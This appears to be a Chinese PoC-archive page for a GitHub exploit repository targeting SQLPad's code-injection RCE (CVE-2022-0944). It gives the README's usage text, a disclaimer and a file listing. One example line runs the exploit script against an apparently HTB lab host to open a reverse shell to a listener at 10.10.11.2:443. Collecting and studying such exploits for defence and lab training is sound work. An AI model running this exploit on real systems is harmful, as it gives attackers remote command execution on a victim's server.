POC详情: 51dd4f1055f003d09b4d02c52552064d3bd42be3

来源
https://github.com/Robocopsita/CVE-2022-0944_RCE_POC
关联漏洞
标题: sqlpad 代码注入漏洞 (CVE-2022-0944)
描述:sqlpad是一个基于 Web 的 SQL 编辑器。 sqlpad 存在安全漏洞,目前暂无该漏洞信息,请随时关注CNNVD或厂商公告。
介绍
# CVE-2022-0944

Proof of concept exploit for [SQLPad RCE (CVE-2022-0944)](https://huntr.com/bounties/46630727-d923-4444-a421-537ecd63e7fb) leading to a RCE with a revershell to the attackers PC.

## Usage

```
usage: script.py URL IP PORT

positional arguments:
  URL         URL to SQLPad
  IP       Listener host address for reverse shell
  PORT       Listener port for reverse shell
```

**Example:**

```bash
# trigger exploit
./script.py http://admin.sightless.htb 10.10.11.2 443
```

# Disclaimer
This repository contains tools that are intended solely for educational purposes, specifically for use in cybersecurity learning environments. The author of this code assumes no responsibility for any consequences arising from the use, misuse, or modification of this code. The code is provided "as is" without any warranty, either express or implied, including but not limited to the implied warranties of merchantability or fitness for a particular purpose.
文件快照

 [4.0K]  /data/pocs/51dd4f1055f003d09b4d02c52552064d3bd42be3
├── [1.0K]  LICENSE
├── [ 964]  README.md
└── [2.5K]  script.py

0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。